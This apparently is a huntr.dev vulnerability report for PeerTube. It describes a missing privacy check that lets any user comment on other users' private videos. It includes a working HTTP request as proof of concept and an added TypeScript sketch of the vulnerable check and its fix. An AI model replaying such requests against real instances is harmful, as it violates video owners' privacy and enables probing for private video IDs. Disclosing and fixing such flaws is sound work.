History: Feb 14, 2022 - 4:58 a.m.

Improper Authorization in chocobozzz/peertube

2022-02-14 04:58:10
nhiephon
www.huntr.dev
8

EPSS: 0.001 (Low), Percentile: 21.4%

Description

The app does not check the privacy status of a video before making data changes. Normal users can create a new comment, or reply to a comment, on private videos.

Proof of Concept

Note: I’m using the instance p.lu for testing.

  • Step 1: Log in as user test1 and upload a private video. Note the video ID of the private video.
  • Step 2: Send this request with the token of user test2:
POST /api/v1/videos/53328/comment-threads HTTP/2
Host: p.lu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer d8163b600e3de89c6039af034a94bd3898d68825
Content-Type: application/json
Content-Length: 16
Origin: https://p.lu
Referer: https://p.lu/w/87rzixn5tGiFBA5iojv9RP
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"text":"hello"}
  • Step 3: In the browser of user test1, you can see that the like count for the video is 1.
  • PoC:

send comment: https://drive.google.com/file/d/1qkNAeu5vSsdA7-PeWszHbIngiiLzk9u_/view?usp=sharing

comment in private video: https://drive.google.com/file/d/1jdIuH75caNHvTZob7vBtsvKkVKbz2pcF/view?usp=sharing

Impact

Attackers can create comments on private videos. This can also be abused to enumerate the IDs of private videos, based on the response to the API call.
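The missing check and its fix, as an added example that is not PeerTube's own code: a simplified model of the authorization decision behind POST /api/v1/videos/:id/comment-threads, with the vulnerable shape (existence only) beside a hardened one that consults the video's privacy and answers for a foreign private video exactly as it does for a missing one, so the status code no longer confirms which IDs exist. Type and function names, the privacy enum and the sample data are assumptions for illustration.

```typescript
// Added example, not PeerTube's own code. Simplified model of the authorization
// decision for creating a comment thread; names, shapes and data are assumptions.

enum VideoPrivacy { PUBLIC = 1, UNLISTED = 2, PRIVATE = 3 }

interface Video { id: number; ownerAccountId: number; privacy: VideoPrivacy }
interface Caller { accountId: number }

// Constructed sample data: video 53328 is test1's private upload, 53329 a public one;
// test2 is the unrelated user from the report.
const TEST1: Caller = { accountId: 1 };
const TEST2: Caller = { accountId: 2 };
const VIDEOS: Video[] = [
  { id: 53328, ownerAccountId: TEST1.accountId, privacy: VideoPrivacy.PRIVATE },
  { id: 53329, ownerAccountId: TEST1.accountId, privacy: VideoPrivacy.PUBLIC },
];

// Vulnerable shape of the check: only "does the video exist?", so any authenticated
// user may create a comment thread on a private video.
function commentThreadStatusVulnerable(videoId: number, _caller: Caller): number {
  const video = VIDEOS.find(v => v.id === videoId);
  return video ? 200 : 404;
}

// Hardened: look at the privacy level before the data change. A private video the
// caller does not own is answered like a missing video (404, not 403), so the
// response cannot be used to tell which IDs belong to private videos.
function commentThreadStatusHardened(videoId: number, caller: Caller): number {
  const video = VIDEOS.find(v => v.id === videoId);
  if (!video) return 404;
  const isOwner = video.ownerAccountId === caller.accountId;
  if (video.privacy === VideoPrivacy.PRIVATE && !isOwner) return 404;
  return 200;
}

// Existence oracle: true if a private video ID and a non-existent ID are
// distinguishable by the status the check returns to this caller.
function leaksExistence(check: (id: number, c: Caller) => number, caller: Caller): boolean {
  return check(53328, caller) !== check(99999, caller);
}
```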

